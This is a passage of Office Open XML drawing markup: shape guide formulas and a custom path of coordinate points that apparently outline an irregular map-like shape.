                  <a:gd name="T38" fmla="*/ 89 w 256"/>
                  <a:gd name="T39" fmla="*/ 226 h 295"/>
                  <a:gd name="T40" fmla="*/ 70 w 256"/>
                  <a:gd name="T41" fmla="*/ 228 h 295"/>
                  <a:gd name="T42" fmla="*/ 42 w 256"/>
                  <a:gd name="T43" fmla="*/ 235 h 295"/>
                  <a:gd name="T44" fmla="*/ 24 w 256"/>
                  <a:gd name="T45" fmla="*/ 234 h 295"/>
                  <a:gd name="T46" fmla="*/ 55 w 256"/>
                  <a:gd name="T47" fmla="*/ 210 h 295"/>
                  <a:gd name="T48" fmla="*/ 86 w 256"/>
                  <a:gd name="T49" fmla="*/ 207 h 295"/>
                  <a:gd name="T50" fmla="*/ 105 w 256"/>
                  <a:gd name="T51" fmla="*/ 205 h 295"/>
                  <a:gd name="T52" fmla="*/ 116 w 256"/>
                  <a:gd name="T53" fmla="*/ 175 h 295"/>
                  <a:gd name="T54" fmla="*/ 171 w 256"/>
                  <a:gd name="T55" fmla="*/ 76 h 295"/>
                  <a:gd name="T56" fmla="*/ 177 w 256"/>
                  <a:gd name="T57" fmla="*/ 56 h 295"/>
                  <a:gd name="T58" fmla="*/ 186 w 256"/>
                  <a:gd name="T59" fmla="*/ 52 h 295"/>
                  <a:gd name="T60" fmla="*/ 197 w 256"/>
                  <a:gd name="T61" fmla="*/ 18 h 295"/>
                  <a:gd name="T62" fmla="*/ 203 w 256"/>
                  <a:gd name="T63" fmla="*/ 5 h 295"/>
                  <a:gd name="T64" fmla="*/ 241 w 256"/>
                  <a:gd name="T65" fmla="*/ 35 h 295"/>
                  <a:gd name="T66" fmla="*/ 252 w 256"/>
                  <a:gd name="T67" fmla="*/ 31 h 295"/>
                  <a:gd name="T68" fmla="*/ 249 w 256"/>
                  <a:gd name="T69" fmla="*/ 55 h 295"/>
                  <a:gd name="T70" fmla="*/ 230 w 256"/>
                  <a:gd name="T71" fmla="*/ 59 h 295"/>
                  <a:gd name="T72" fmla="*/ 200 w 256"/>
                  <a:gd name="T73" fmla="*/ 65 h 295"/>
                  <a:gd name="T74" fmla="*/ 178 w 256"/>
                  <a:gd name="T75" fmla="*/ 64 h 295"/>
                  <a:gd name="T76" fmla="*/ 188 w 256"/>
                  <a:gd name="T77" fmla="*/ 81 h 295"/>
                  <a:gd name="T78" fmla="*/ 174 w 256"/>
                  <a:gd name="T79" fmla="*/ 90 h 295"/>
                  <a:gd name="T80" fmla="*/ 22 w 256"/>
                  <a:gd name="T81" fmla="*/ 284 h 295"/>
                  <a:gd name="T82" fmla="*/ 12 w 256"/>
                  <a:gd name="T83" fmla="*/ 289 h 295"/>
                  <a:gd name="T84" fmla="*/ 18 w 256"/>
                  <a:gd name="T85" fmla="*/ 268 h 295"/>
                  <a:gd name="T86" fmla="*/ 7 w 256"/>
                  <a:gd name="T87" fmla="*/ 262 h 295"/>
                  <a:gd name="T88" fmla="*/ 14 w 256"/>
                  <a:gd name="T89" fmla="*/ 249 h 295"/>
                  <a:gd name="T90" fmla="*/ 28 w 256"/>
                  <a:gd name="T91" fmla="*/ 247 h 295"/>
                  <a:gd name="T92" fmla="*/ 39 w 256"/>
                  <a:gd name="T93" fmla="*/ 259 h 295"/>
                  <a:gd name="T94" fmla="*/ 32 w 256"/>
                  <a:gd name="T95" fmla="*/ 283 h 295"/>
                  <a:gd name="T96" fmla="*/ 54 w 256"/>
                  <a:gd name="T97" fmla="*/ 264 h 295"/>
                  <a:gd name="T98" fmla="*/ 50 w 256"/>
                  <a:gd name="T99" fmla="*/ 246 h 295"/>
                  <a:gd name="T100" fmla="*/ 68 w 256"/>
                  <a:gd name="T101" fmla="*/ 236 h 295"/>
                  <a:gd name="T102" fmla="*/ 83 w 256"/>
                  <a:gd name="T103" fmla="*/ 239 h 295"/>
                  <a:gd name="T104" fmla="*/ 67 w 256"/>
                  <a:gd name="T105" fmla="*/ 248 h 295"/>
                  <a:gd name="T106" fmla="*/ 54 w 256"/>
                  <a:gd name="T107" fmla="*/ 264 h 295"/>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256"/>
                  <a:gd name="T163" fmla="*/ 0 h 295"/>
                  <a:gd name="T164" fmla="*/ 256 w 256"/>
                  <a:gd name="T165" fmla="*/ 295 h 295"/>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256" h="295">
                    <a:moveTo>
                      <a:pt x="118" y="173"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="119" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="173"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="171" y="91"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="170" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="239" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="91"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="23" y="295"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="20" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="295"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="54" y="264"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="52" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="256"/>
                    </a:lnTo>
